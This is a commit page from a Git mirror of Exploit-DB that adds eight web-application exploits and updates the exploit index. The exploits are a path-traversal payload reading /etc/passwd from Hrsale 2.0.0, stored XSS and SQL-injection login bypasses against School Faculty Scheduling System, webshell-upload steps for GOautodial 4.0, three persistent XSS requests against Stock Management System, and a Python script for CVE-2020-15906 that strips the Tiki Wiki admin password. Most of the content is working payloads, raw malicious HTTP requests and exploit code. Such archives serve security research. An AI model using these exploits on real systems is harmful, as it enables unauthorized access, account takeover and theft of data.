bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-10-22

Browse source 
8 changes to exploits/shellcodes

Hrsale 2.0.0 - Local File Inclusion
School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC
School Faculty Scheduling System 1.0 - Authentication Bypass POC
GOautodial 4.0 - Authenticated Shell Upload
Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting
Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting
Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
This commit is contained in:
Offensive Security 2020-10-22 05:02:10 +00:00
parent 5aa3bfc759
commit 1539c20e48
9 changed files with 380 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
exploits/php/webapps/48920.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
# Date: 10/21/2020
# Exploit Author: Sosecure
# Vendor Homepage: https://hrsale.com/index.php
# Version: version 2.0.0
Description:
This exploit allow you to download any readable file from server with out permission and login session.
Payload :
https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
POC:
1. Access to HRsale application and browse to download path with payload
2. Get /etc/passwd

43
exploits/php/webapps/48921.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
Step 2: use payload <script>alert(document.cookie)</script> in Course and Description field
Malicious Request
POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
Content-Length: 478
Origin: http://localhost
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="id"
-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="course"
<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793
Content-Disposition: form-data; name="description"
<script>alert(document.cookie)</script>
-----------------------------168636252127671582243354784793--
Step 3: Cookie will be reflected each time someone visits the Course List section.

31
exploits/php/webapps/48922.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin
Step 2: use payload jyot' or 1=1# in user and password field
Malicious Request
POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/login.php
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
Step 3: You will be logged in as admin.

17
exploits/php/webapps/48923.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: GOautodial 4.0 - Authenticated Shell Upload
# Author: Balzabu
# Discovery Date: 07-23-2020
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last relase as of today)
# Tested on OS: CentOS 7
# STEPS TO REPRODUCE:
1 - Log in as an agent
2 - Write a new message to user goadmin with random subject and text
3 - Attach your webshell to the message
4 - Access your shell at
https://www.foo.com/uploads/year/month/shellname.php ( Example:
https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php )
5 - Priv esc and enjoy ... :-)

85
exploits/php/webapps/48924.txt Normal file
View file

@ -0,0 +1,85 @@
# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name)
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerability Details
# Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function.
# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected.
#Steps:
1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
2. Click "Product"
3. Click "Action" in any categories name row
4. Click Edit, then Product Info (tab)
5. In "Product Name" field enter XSS <script>alert("XSS")</script>
6. Click save changes
7. Any page on the webapp expecting that 'Product Name' will trigger the XSS.
POST /stock/php_action/editProduct.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/product.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477
Content-Length: 938
DNT: 1
Connection: close
Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editProductName"
<script>alert("hyd3sec")</script>
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editQuantity"
9
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editRate"
1200
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editBrandName"
12
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editCategoryName"
7
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="editProductStatus"
1
-----------------------------147762840819880874581057152477
Content-Disposition: form-data; name="productId"
8
-----------------------------147762840819880874581057152477--

47
exploits/php/webapps/48925.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name)
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerability Details
# Description A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function.
# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected.
#Steps:
1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
2. Click "Category"
3. Click "Action" in any categories name row
4. Click Edit
5. In "Categories Name" field enter XSS <script>alert("XSS")</script>
6. Click save changes
7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS.
POST /stock/php_action/editCategories.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/categories.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 102
DNT: 1
Connection: close
Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9

44
exploits/php/webapps/48926.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name)
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerability Details
# Description A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function.
# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected.
#Steps:
1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
2. Click "Brand"
3. Click "Action" in any brand name row
4. Click Edit
5. In "Brand Name" field enter XSS <script>alert(1)</script>
6. Click save changes
7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS.
POST /stock/php_action/editBrand.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/brand.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
DNT: 1
Connection: close
Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14

90
exploits/php/webapps/48927.py Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64
#!/usr/bin/env/python3
import requests
import json
import lxml.html
import sys
banner = '''
Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
url = "http://"+rhost+"/tiki/tiki-login.php"
session = requests.Session()
def get_ticket():
r = requests.get(url)
login_page = r.text.encode('utf-8')
html = lxml.html.fromstring(login_page)
auth = html.xpath('//input[@name="ticket"]/@value')
return str(auth)[2:-2]
def get_cookie():
session.get(url)
return session.cookies.get_dict()
cookie = get_cookie()
ticket = get_ticket()
payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzrhost, deflate',
'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '125',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0',
}
for i in range(60):
r = session.post(url, payload, headers)
if("Account requires administrator approval." in r.text):
print("Admin Password got removed.")
print("Use BurpSuite to login into admin without a password ")
if(__name__ == '__main__'):
main()

8
files_exploits.csv
View file

@ -40738,6 +40738,14 @@ id,file,description,date,author,type,platform,port
48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java,
48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,
48920,exploits/php/webapps/48920.txt,"Hrsale 2.0.0 - Local File Inclusion",2020-10-21,Sosecure,webapps,php,
48921,exploits/php/webapps/48921.txt,"School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC",2020-10-21,"Jyotsna Adhana",webapps,php,
48922,exploits/php/webapps/48922.txt,"School Faculty Scheduling System 1.0 - Authentication Bypass POC",2020-10-21,"Jyotsna Adhana",webapps,php,
48923,exploits/php/webapps/48923.txt,"GOautodial 4.0 - Authenticated Shell Upload",2020-10-21,Balzabu,webapps,php,
48924,exploits/php/webapps/48924.txt,"Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.